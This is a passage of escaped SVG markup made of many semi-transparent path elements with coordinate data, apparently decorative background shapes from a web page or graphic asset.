d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M293.23,62.28c-3.39.51-6.81.82-10.2,1.29a25.57,25.57,0,0,0-3.07.78c3.6.21,7.19.47,10.79.62,1.82.07,3.65-.06,5.48-.09C296.06,63.05,295.38,62,293.23,62.28Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M381.28,72.89c2,.52,3.14-.28,3.48-2.33.19-1.18.52-2.34.79-3.51l-2.08.58Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M419.42,60.3c-.14-.62-2.26-1.23-3.36-1.08-.95.13-2.57,1.52-2.45,2a3.58,3.58,0,0,0,.91,1.54l6.14.81A12.24,12.24,0,0,1,419.42,60.3Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M416.07,66a3.28,3.28,0,0,1-3.5.35,25.63,25.63,0,0,1-4.73.71,2.23,2.23,0,0,0,1.79.7c2.87.1,5.75-.14,8.63-.16,1.26,0,2.79-.18,3.68.45.62.43.79,2.32.39,3.2-1.43,3.17.41,3.24,2.63,3.16.88-3.25,3.72-2.82,6.1-3.27-.16-.29-.25-.78-.48-.85-3.11-1-6-2.18-8.09-4.26C420.35,66,418.21,66,416.07,66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1895.24,114.11a8,8,0,0,1,1.56-2.31,11.38,11.38,0,0,1-1.64.24C1895.17,112.73,1895.19,113.42,1895.24,114.11Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1905.75,106c0-.09.08-.18.11-.27l-1.19-.76c-5.26.56-7.07-.66-9.71-4.92-.77-1.25-3.3-1.84-5.07-1.94-2.62-.15-5,.42-7.87-.48-2.42-.78-5.66,1-9.08,1.79a7.37,7.37,0,0,1-.4-1.8c-.18-3-2.6-4.3-5.11-2.8a6.53,6.53,0,0,1-2.39,1.06c-3.41.41-6.84.81-10.26.92a27.36,27.36,0,0,1-5.26-.81l-3.89-.68a11.48,11.48,0,0,0,2.06,2.26c2.17,1.39,4.47,2.57,6.7,3.87.85.5,1.65,1.58,2.45,1.55,3.57-.12,7.14-.54,11.48-.92a8.36,8.36,0,0,1,1.19,1.93,8.2,8.2,0,0,0,7.45,5c.56,0,1.08.73,1.68.85,2,.4,4,.68,6,1-.24-1.53-.5-3.06-.72-4.6-.12-.86-.48-1.9-.15-2.56a2.76,2.76,0,0,1,2.16-1.12,51.21,51.21,0,0,1,5.5.55l.92-1.3a38.5,38.5,0,0,1,2.41,5.92,21,21,0,0,1,.41,4.29,11.38,11.38,0,0,0,1.64-.24,4.84,4.84,0,0,1,2.63-1.43v-5.44A6.52,6.52,0,0,0,1905.75,106Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1906.11,105.9l-.25-.16c0,.09-.07.18-.11.27Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1906.31,106l-.2-.13-.36.11c-.87,2.2-1.66,4.4-.56,6.6,0-3.84,1.92,0,3.84-1.92a6.49,6.49,0,0,0-1.87,4.88c.08,0,.16,0,.25.06,1.19.38,2.88-.85,4.34-1.34-.64-1.15-1.21-2.34-1.94-3.42C1908.7,109.22,1907.48,107.64,1906.31,106Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M1905.19,112.61c-1.1-2.2-.31-4.4.56-6.6a6.52,6.52,0,0,1-6.32-1.08v5.44a7.28,7.28,0,0,1,3.42.33c.57.17.94,1,1.41,1.51-.47.39-.92.82-1.41,1.18-1.16.85-2.33,1.68-3.5,2.51a10.94,10.94,0,0,1,7.81-.33,6.49,6.49,0,0,1,1.87-4.88C1907.11,112.61,1905.19,108.77,1905.19,112.61Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1841.25,93.09l-2.65,1.15c-.44,1.45-.88,2.9-1.39,4.61l7.11-3.44-1.62-1.88Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1805.12,94.7l.12,1.32c1.9.79,3.55.73,4.61-1.34l-2.87-1Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1610.26,74.9c-3-2.13-6.32-3.74-9.72-5.7-1.09,2.47-1.5,4.62-4.13,3-.25-.15-1.88,1.28-2.25,2.23-.27.7.45,1.8.76,2.82l-3.83.53a15.57,15.57,0,0,1-.45-3.63c.42-3.24-2.32-3.61-4.14-4.18-2.08-.66-4.46-.36-6.71-.47-4.33.72-1.18,5.15-3.41,8.37l-3-5.61c-5.69-1.77-11.75,2.1-17-2a.46.46,0,0,0-.33-.07c-3.42.13-6.84.22-10.25.46a7.76,7.76,0,0,0-2.34,1,76.7,76.7,0,0,0,11,.88c3.11,0,6.07,3.85,9.82,1.13,4.48,2.21,9.91,2.83,12.88,7.72,2.49-.31,4.22-1.21,4.2-4.18,0-.68,1.05-2,1.44-1.94a3.9,3.9,0,0,1,2.48,1.54c.49.79,0,2.29.57,2.91a21.57,21.57,0,0,0,3.84,2.76c.55-2,1.63-2.65,3.75-2,1,.3,2.26-.22,3.4-.36l.61-.79c.34-1,.42-2.56,1.06-2.83,2.55-1.06,5.31-2.4,7.91-2.24,1.38.09,2.58,3,3.87,4.69l.85.6,4.24-4.74-.08,0-.07-.06C1613.61,75.42,1612.25,76.32,1610.26,74.9Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1672.05,77.23c-7.14,2.24-12.93-.67-18.27-5.13-2,1.79-4.39,3.18-5.58.06s-3.12-3.37-5.78-3.25a10.49,10.49,0,0,1-3.93-.59c-4.74-1.76-11.18.87-13.09,5.71a36,36,0,0,1-3.67-1.4c-3.2-1.64-4.49-1.26-6.49,2.07l.07.06.08,0c3.23.21,6.47.29,9.67.68,1,.13,2,1.08,3,1.65,2.17-.16,4-.47,3.94-3.46,0-1,1.46-2.37,2.55-2.75.7-.25,2,.95,2.9,1.6.54.37.87,1.24,1.42,1.38,5,1.3,10.1,2.46,15.14,3.74,2.52.64,5,1.52,7.51,2.18,1.6.42,3.25.65,4.88,1l1.9-1,4-1.18,1.11-.79a2.61,2.61,0,0,0-.08-.55Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1418.08,75.15l-2,1.17A2.8,2.8,0,0,1,1411.7,74c-.08-2.55-1.19-2.8-3.27-2-1.73.62-3.53,1-5.69,1.6-.74,2-1.7,4.51-2.34,6.2-2.42,0-5.09-.22-5.19.16a12.83,12.83,0,0,1-1.06,3c2.55.09,4.55-2.42,7.06-1.16.26-.38.5-.77.75-1.18.9-1.51,2.64-3.34,4.15-3.49a16.85,16.85,0,0,1,7.51,1.39c.92.37,1.21,2.37,2.16,4.46,1-3.19.65-6.75,4.61-6.79-.18-.64-.36-1.28-.59-2.08Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1521.68,67.32a3.24,3.24,0,0,0-2.29.3c-3.15,2.53-6.32,1.19-9.62.47-1.15-.26-2.56.65-3.85,1,3.86.44,7.7,1.08,11.57,1.25,4.37.19,8.78-.25,13.15,0,3.83.2,7.63.94,11.44,1.44a11.89,11.89,0,0,0-2.91-1.47C1533.35,69.22,1527.52,68.26,1521.68,67.32Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1432.47,69.35c-2.84-.79-6.83,2.34-7.59,5.52l9.91-2.57C1434,71.27,1433.44,69.62,1432.47,69.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1494.72,69.78c1.49-.63,3.52.08,5.31.07a7.58,7.58,0,0,0,1.93-.52L1491.9,68C1492.27,69.4,1492.31,70.81,1494.72,69.78Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1823.13,91.5c2.2,1.79,4.19,4,6.66,5.22,1.69.84,4.32,1.3,5.58-1.44-3-1.35-5.89-2.82-8.94-4C1825.5,90.94,1824.24,91.41,1823.13,91.5Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1803.27,96.36l-3.54-.31C1800.73,98.26,1801.87,98.73,1803.27,96.36Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1899.21,117.79l.45.23-.06-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1899.32,115.94l-1,1.4.9.45.39-.15C1899.5,117.07,1899.41,116.5,1899.32,115.94Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M829.91,17.17c3.32,1.48,6.16,4,8.5,5.66.69,2.1.83,4,1.82,5,.54.56,2.52-.25,3.85-.44L844,26.26l-3.13-1.57,1.68-4.79.52.89,5.46-.74c2.14,1.1,3.93,2,5.74,2.95,1.08.55,2.9.83,3.16,1.63,1.61,4.89,4.53,2.43,7.35,1.72a17.15,17.15,0,0,1,4.64,0c.77,0,1.59.45,2.3.29,3.48-.78,6.07.56,8.42,3s3.3,2.39,5.56-.86h0l0,0h0c-1.9-.49-4-.6-5.64-1.55-2.79-1.6-5.49-3-8.83-2.53a1.37,1.37,0,0,1-.67,0c-2.43-.85-4.8-2.09-7.29-2.46-2.32-.35-4.77.22-7.41.4.25-1.64.44-2.83.62-4l-5.58-2.33-1.28-.27c-1.13.42-2.29,1.24-3.4,1.17-2.26-.13-4.56-1.22-6.33,1.25a3.36,3.36,0,0,1-2-1,4.6,4.6,0,0,0-4.76-2.91c-2.65,0-5.3-.43-8-.67L823,12.54l-4,0-1.36,1.23a11.41,11.41,0,0,0,2.6,1.37C823.45,15.84,827,15.86,829.91,17.17Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M628.92,64.11a4,4,0,0,0,2.57-1.64c1.61-3.27,4-2.52,6.27-1.29,3.89,2.08,8,1.82,10.88-.64l6.54.81c.05.43.13,1.18.18,1.61,6.45-2.75,14.07-1.15,19.28-6.26,4,3.24,3.87,3.16,7.22-.54a4.35,4.35,0,0,1,3.43-.95c3.6.59,6.43-.35,8.67-3.28s3-2.8,5.56,0l2.38-2.67a13.59,13.59,0,0,0-3.13-1.19c-3.33-.42-3.45-2.07-2.27-4.71.34-.74-.37-1.91-.45-2.9s0-2.27,0-3.41c1.2,0,2.64-.41,3.55.12a30,30,0,0,1,4.4,3.71c-.4-.91-1.31-2-1.11-2.71.86-3.1-.42-3.09-2.93-2.79-1,.12-2.25-1.43-3.39-2.22a14.65,14.65,0,0,1,2.5-1.72c1.06-.45,2.31-.45,3.37-.89.76-.32,2-1.2,1.91-1.55a22.79,22.79,0,0,0-1.6-3.82L699,26c.5-1,.78-2.26,1.56-2.94a29.86,29.86,0,0,1,4.4-2.71c.47,1,1,1.58,1,2.15-.08,2.06.56,4.18,2.67,3.75,1.19-.24,2-2.77,2.79-4.36.27-.53-.11-1.35,0-2,.18-1.56.46-3.11.7-4.66l.94-.57c2.37,4.62,5.35,3.84,8.33,1.56,1.77-1.36,3.91-2.68,4.86-4.55,1.87-3.63,2.13-4,6.66-2.81l-1.71,4.17c2.19,0,3.65.07,5.11,0,2-.12,4.31,1,5.73-1.59.21-.39,2-.5,2.47-.08,2.2,1.88,4.7.78,7,1.14a74.34,74.34,0,0,1,7.66,2,7.56,7.56,0,0,0,1.82.32c1.35,0,2.9-.49,4,0,2.42,1,4.58,2.68,6.93,3.9a14.93,14.93,0,0,0,3.31.88c0-1.07-.14-2.14-.07-3.19s.2-3.15.54-3.2a34.09,34.09,0,0,1,7.62-.28c.21,0,.26,2.7.33,4.15a13.6,13.6,0,0,0,0,2.71c.31,1.18.71,3,1.46,3.27,1.8.53,4,2.17,6-.42-.76-.89-1.8-1.63-2.08-2.59a4.11,4.11,0,0,1,.35-3.22,75.25,75.25,0,0,1,5.12-5.76l-4.23-.85h-1.75a23.59,23.59,0,0,1-4.87.23c-4.93-.78-9.8-1.94-14.74-2.64A7.7,7.7,0,0,0,764.73,9a12.36,12.36,0,0,1-11.05.46c-.51-.21-1.33-.55-1.59-.33-3.85,3.18-5.5-2.22-8.51-2.15-.06,0-.12-.41-.18-.62l-1.29.11c-2.07,3.28-4.58,3-7.61-.72l-4,0-8.09,4c-1.32-.92-3.16-1.42-4.43,1.62-.64,1.52-2,1.41-2.69-.2A31.91,31.91,0,0,1,714.1,7l-4.7.72c-.26.87-.58,1.72-.79,2.59-.65,2.77-1.66,4.61-4.66,2a1.92,1.92,0,0,0-1.27-.45C694,12.55,686,9,677.53,7.84c-7.12-1-10.72,2.1-15.18,6.16l-.93-2.22c-2.34.47-4.46.84-6.55,1.35-1.41.35-2.76.91-4.14,1.36s-3,.95-4.43,1.4c-2.86.87-2.94,3.58-2.8,5.56.17,2.28,1.58,4.46,2.5,6.81,3.22-2.47,1.91-7.61,6.6-9-1.43,5.66-2.78,11-4.11,16.31h8.27l1.52-2L660.16,35a62.13,62.13,0,0,0,6.15-1,6.4,6.4,0,0,0,2.42-1.67c2.82-2.66,4.43-2.49,6.69.82.5.74.89,1.55,1.33,2.33l1.27,0c3.29-1.6,4.49.31,5,2.79,1.88.76,3.88,1,5,2.18a5.3,5.3,0,0,1,1.31,4.43,5.08,5.08,0,0,1-3.59,2.81,45.42,45.42,0,0,1-10.16,0,7.44,7.44,0,0,1-4.27-2.35c-2.85-3.18-3.63-3.18-5.73,1.12-.32-1.48-.56-2.59-1-4.78l-5.06,7.23c-8.42-4.81-7.21-4.6-12.22.4-1.86-2.11-4.43-4.06-6.74-2-1.57,1.36-6.06.63-5.15,4.57h7a17.25,17.25,0,0,1,.21,3.11,29.4,29.4,0,0,1-.88,3.44,13.22,13.22,0,0,1-3.1-1.4c-1.86-1.49-3.39-1.28-5.13.2a2.66,2.66,0,0,1-2.33.28c-.43-.18-.58-1.34-.58-2.07,0-2,.15-3.93.24-5.9l-1.5-.44-4.38,5.54c.44,2.07.87,4.15,1.3,6.21-5.57,1.5-5.57,1.5-5.65,3.89,1.33-.18,2.63-.43,3.94-.51A35.87,35.87,0,0,0,628.92,64.11Zm31-43c-.86-.22-1.49-1.36-2.23-2.1.66-.59,1.27-1.59,2-1.67s1.46.81,2.2,1.27c.2.44.4.87.59,1.31C661.61,20.33,660.63,21.25,659.92,21.08Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M985,55.33c1.46-2.15,3-1.15,4.76-.44,5.9,2.42,12,3.57,18.34,2.29.65-.12,2,.4,2.1.83.72,3.42,3.4,3.9,6.1,4.17,6.63.67,13.45,2.49,19-3.39.76-.81,2.85-.92,4.13-.58,4.64,1.21,9.25,2.57,13.75,4.2s7.75.24,9.1-4.07a10.62,10.62,0,0,1,.93-1.83c1.5,2.4,2.88,4.59,4.67,7.46,2-2.3,3.74-4.51,5.69-6.53.87-.9,2.23-2,3.22-1.92s2.08,1.55,2.91,2.57,1,2.73,1.83,3c3.21,1,6.57,1.61,9.87,2.35.5-1.36,1-2.72,1.44-3.87l-9.51-3.68c.26-2.06,1.18-4.23.5-5-1.34-1.55-3.45-2.5-5.7-.66-.7.57-2.06.26-3.1.48-1.46.31-3.25.32-4.28,1.19-2.55,2.15-5.08,1.41-8.44.93l6-4.6-.54-1c-2.62.6-5.77-1.68-7.81,2.27a75.78,75.78,0,0,1-4.52,7l-5-4.48c-3.75.55-7.67.15-11.14,2.29-.61.38-1.7,0-2.58,0-2.43-.07-5.53-1.09-7.16,0-2.81,1.92-5,3.09-8.39,1.6-1.68-.74-3.94-.25-5.58-1-5.87-2.85-11.71-3.89-17.88-1.09-.41.18-1.15-.31-1.71-.55s-1.53-1.05-1.94-.85c-4.21,2.08-8.5-2.77-12.67.18-.17.13-.9-.23-1.14-.54-1.95-2.59-3.37-1.33-4.72.6,2.66,1.1,5.3,2.25,8,3.27A1.59,1.59,0,0,0,985,55.33Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M409.63,67.73c2.4.08,4.82-.07,7.23-.13a2.58,2.58,0,0,1,1.94-.47,8.4,8.4,0,0,0,1.4.43,4.27,4.27,0,0,1,1.22.21c3.68.44,7.7-.46,10.67,2.75.18.2.62.21,1,.25l17.24,2.13v3.48l11.92-2c5.85-1,10,3.53,15.15,4.94,3.69,1,6.73,1.89,10-.58,1.47-1.11,2.59-3.55,5-1.2.17.17,1.73-.58,2.1-1.21a40.76,40.76,0,0,0,2.08-4.91l-3.05-1.14-2,1.35-.95.4-.4,1c-.4.62-1,1.83-1.18,1.77-3.22-1.15-7.18.12-9.79-3l-3.3-.12c-.48,2.5-2.2,2.1-3.94,1.71A45.91,45.91,0,0,0,467,72.33c-2.9-.35-6.4.42-8.61-1-4.34-2.7-8.77-1.22-13.12-1.78-3.89-.5-8-.54-11.59-1.87-5.92-2.19-11.91-1.64-17.91-1.77-2.64,0-5.27,1.05-7.93,1.07A2.23,2.23,0,0,0,409.63,67.73Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M528.33,60,532,62.45l1-.27,2.73-2.76,2,2.1a1.43,1.43,0,0,0,.16.57c2,2.19,1.8,4.12-.66,6.21a1.48,1.48,0,0,0-.19.57c0,.71.06,1.42.08,2.13.91,0,2.15.29,2.65-.18,2.74-2.53,4.64-1.92,6.27,1.18a2,2,0,0,0,1.64.63c.48-.5,1.07-1.51.86-2-1-2.06.52-5.25-2.83-6.36-.17,0,.1-3.21.62-3.36,5.07-1.48,8.48-7.13,14.61-5.91.16,0,.45-.66.68-1l-.74-1.36.07-.12-3.44-.5-8.15,0-4.79.53c-.91,2.39-1.8,4.34-5.06,2.42A10.91,10.91,0,0,0,534,54c-3.57.08-6.12,2.92-5.72,6Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M797.9,16.16c4.54,1.39,4.73,1.71,3.73,5.93,5.87,2.82,12.19.84,19.09,1.15L818.5,19c-2,1.22-3.54,2.9-4.49,2.61-2-.6-3.28-2.38-2.1-4.74l.71.53,3.64-3.57c-4-2.19-8.21-1.74-12.42-.6-1.08.29-2.19.49-3.28.74V9.76l-4,.62v.69C797,12.75,794.67,15.18,797.9,16.16Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M898.68,32.93A23.5,23.5,0,0,1,905,36.22c2.23,1.52,4.15,3.79,7.08,1.3a1.55,1.55,0,0,1,1.24-.28c3.11,1,6.21,2.07,9.67,3.24a6.75,6.75,0,0,1,8.71,1.39c1.94,2.4,6.73,2.33,9.15-.14a9.88,9.88,0,0,0-2.6-1.37c-8.16-1.43-15.42-6.32-23.95-6.26-2,.87-3.89,1.8-5.89,2.54-.32.12-1.27-.57-1.38-1a2.27,2.27,0,0,1,.64-1.7,19.13,19.13,0,0,1,2.13-1.87l-.15-.16-2.89-.56a48.5,48.5,0,0,0-5.84-2.1,17.66,17.66,0,0,0-4.35.07C896.65,30.87,896.43,32.29,898.68,32.93Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M600.59,62l2.14-1.93.07.87c2.81.33,5.62.75,8.44.87.42,0,1.19-1.39,1.28-2.2a10,10,0,0,0-.53-2.94c-.68-.56-1.32-1.17-2-1.67-3.19-2.25-6.4-4.47-9.6-6.71l-1.28,0c0,.3,0,.59,0,.89l3.51,2.9C598.91,57,598.36,59.78,600.59,62Z\" transform=\"translate(0 0)\"\n          opacity=\"0.1\"></path>\n        <path d=\"M793.24,26.65a4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76-1.26-3.64-.74-7.86-5.65-8.65-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0A12.07,12.07,0,0,0,793.24,26.65Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M945.42,45.14a7.4,7.4,0,0,1,2.3.36c4.19,1,8.38,2,12.55,3,1.46.37,3.3.56,4.23,1.54,2.66,2.8,5.85,2.55,9.14,2.33-3.18-1.55-6.24-3.5-9.58-4.56-4.33-1.36-8.92-1.9-13.34-3-2.63-.66-5.17-1.72-7.75-2.59C942.68,44.16,943.16,45.34,945.42,45.14Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M705.23,41.47c.24,1,.49,2,.74,3,1.37.31,2.73.68,4.11.92a2.43,2.43,0,0,0,1.77-.14,2.19,2.19,0,0,0,.6-1.77C712.08,41.86,706.69,40.44,705.23,41.47Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M566.9,62.85l4.09-.37c0-.65,0-1.31.08-2l-3.93-.7Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M566.48,55.5c.88-.51,1.75-1,2.62-1.55,0-.33,0-.66,0-1l-2.67-.39h-.72l-1.25.23-.81,1.24C564,55.73,564.79,56.48,566.48,55.5Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.72,28.77c2.09-.33,4.87.74,5.44-2.68l-2.07-.77-3.41,3.4,0,0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M402,64.38a12,12,0,0,0-3.8-.12l3.72,1.19C401.88,65.09,401.91,64.73,402,64.38Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M533.65,70.75l.94,2.17,1.85-1.85-1.39-.76Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1092.16,55.67c.14-.05.18-.35.26-.54l-.57-.24c-.08.19-.27.42-.21.56A.55.55,0,0,0,1092.16,55.67Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M18.44,71.94A8.27,8.27,0,0,0,18,71c-3.4-.93-11.69-5.11-18-8v6.54C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M19.56,70.79a2.81,2.81,0,0,1,1.29-2.4c3.26-1.37,7-2,9.89-3.8,3.33-2.12,6-4.61,8.93.21.19.31,1.5-.08,2.3-.14a11.13,11.13,0,0,0-.78-2.49A13.83,13.83,0,0,0,39.1,60c2-.16,3.6.18,4.53-.44,3.66-2.47,7.56-2.39,11.66-1.88.84.11,1.77-.56,2.67-.87A66.19,66.19,0,0,0,49.7,56c-2.08,0-4.12,1.07-6.22,1.3C35,58.2,26.47,59,18,59.82L13.3,64.15l.6,1.25C15.24,67.29,17,69,18,71,19.1,71.33,19.69,71.3,19.56,70.79Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M66.23,56.25c2.09.74,3.41.14,4.79-1.32a8.11,8.11,0,0,1,2.36-1.45c1.93,2.9,4,.68,6,0,.73,4.47,3.79,5.76,8.55,3.67l-2.66-3.47c2.36-.27,4.3,0,5.56-.73,3.88-2.43,7.67-1.82,11.69-.68.89.25,2.06-.52,3.11-.82L94,49.77q-8.62,1.41-17.24,2.8a2,2,0,0,1-1-.2,5.37,5.37,0,0,0-6.17,1.43,3.11,3.11,0,0,1-2.58.66,7.68,7.68,0,0,0-7.71,2.11c1,0,2,0,3-.06C63.62,56.43,65.09,55.85,66.23,56.25Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23l-2.42-.78c0,.48,0,1-.05,1.46a22.28,22.28,0,0,0,9,3c3.72.58,8.26.5,10.54,5,.64,1.26,2.67,1.7,3.61-.49l0,0c-2.22.08-4.06,0-2.63-3.16.4-.88.23-2.77-.39-3.2a2.09,2.09,0,0,0-.52-.25c-.41,0-.82-.12-1.22-.21-.64,0-1.32,0-1.94,0l-1.4,0-.37.27c-2.69,2.28-9.66,2-11.95-.66-.2-.22-.17-.64-.24-1a7.52,7.52,0,0,0,3.54.79,2.26,2.26,0,0,1-.21-2c.19-.78-1.11-1.93-1.73-2.91a2.57,2.57,0,0,0-.14-.61c-2.85-.2-3.59,1.14-3.81,2.86A3.89,3.89,0,0,1,404.29,66.23Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M398.39,72.46c1.45-.38,3-.49,4.64-.75l-1.86-3.45c-3,3.64-5.33,3.67-8.89.42a22.56,22.56,0,0,0-4.12-2.4C389,69.59,395.25,73.29,398.39,72.46Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1899.43,110.37a4.84,4.84,0,0,0-2.63,1.43,7.83,7.83,0,0,0,2.63-1.11Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1788.06,100.5c1.9-.27,3.93.29,5.9.52,3.39.4,6.78.86,10.17,1.23.38,0,.79-.49,1.21-.52a11.9,11.9,0,0,1,3.42,0,24,24,0,0,1,3.82,1.48c.32-.46.74-.79.8-1.17.32-2.1,1.85-2.36,3.2-1.6.59.33.8,2.25.44,3.13-.76,1.86-2.44,3.59-.39,5.47,2.55,2.34,10.5,1.49,13.12-1a5,5,0,0,1,3.69-1.39c6,1,6,1.16,8.38-4.58.12-.27.43-.45,1.08-1.11,1.41,2.23,2.65,4.31,4,6.3,1.77,2.59,2.83,2.52,4.39-.13.7-1.19,1.53-2.29,2.31-3.43l1.12.12,1.85,8.84c1.67-.23,3.16-.81,4.47-.54,2.45.51,4.64,1.26,6.68-1.11.52-.61,2.25-.65,3.22-.32,7.35,2.44,15.29,3.58,21.22,9.29a6.59,6.59,0,0,0,1.53.83c2.11-1,3.77-2.24,5.51-3l-.9-.45,1-1.4,0,0c1.17-.83,2.34-1.66,3.5-2.51.49-.36.94-.79,1.41-1.18-.47-.52-.84-1.34-1.41-1.51a7.28,7.28,0,0,0-3.42-.33v.32a7.83,7.83,0,0,1-2.63,1.11,8,8,0,0,0-1.56,2.31c0-.69-.07-1.38-.0